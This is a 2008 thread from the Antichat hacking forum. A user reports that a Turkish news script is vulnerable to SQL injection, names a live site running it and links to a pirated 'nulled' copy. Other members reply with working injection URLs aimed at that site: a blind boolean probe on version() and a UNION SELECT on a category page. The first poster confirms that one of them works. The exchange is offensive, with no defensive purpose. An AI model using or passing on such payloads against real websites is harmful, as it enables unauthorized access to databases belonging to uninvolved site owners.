ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql injection is accepted but...
  #1  
Старый 31.03.2008, 09:56
Аватар для aman12
aman12
Новичок
Регистрация: 28.03.2008
Сообщений: 2
Провел на форуме:
4294

Репутация: 1
По умолчанию sql injection is accepted but...

this turkish news script accepts sql injection, but there are no results (i can not inject char). this is very important bug, because there are several thousand sites with this script!

check it here:

http://www.medyapolitik.com/tr/article_view.php?aid=1888-1

is same result
http://www.medyapolitik.com/tr/article_view.php?aid=1887

you can download nulled script here
http://rapidshare.com/files/33605976/internethaber.com.rar

Последний раз редактировалось aman12; 31.03.2008 в 10:06..
 
Ответить с цитированием

  #2  
Старый 31.03.2008, 12:27
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

http://www.medyapolitik.com/tr/article_view.php?aid=1888+and+substring(version(), 1,1)=5/*

u can use subqueries with sql one char bruteforce, in fact the script probably selects one item from news that contents all the text and other info about it (there exist two or more queries for this parametr and they have different number of collumns) so u cant output the info directly
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

Последний раз редактировалось blackybr; 31.03.2008 в 12:30..
 
Ответить с цитированием

  #3  
Старый 31.03.2008, 13:55
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

If you are interested in this site, but it was not the script, that is the withdrawal of the injection
Код:
http://www.medyapolitik.com/tr/cats.php?catid=-10%20union%20select%201/*
sorry for my english... translate.google.com)
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #4  
Старый 31.03.2008, 19:38
Аватар для aman12
aman12
Новичок
Регистрация: 28.03.2008
Сообщений: 2
Провел на форуме:
4294

Репутация: 1
По умолчанию

thank you very much it works )))
 
Ответить с цитированием

  #5  
Старый 02.04.2008, 18:46
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

You're welcome
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ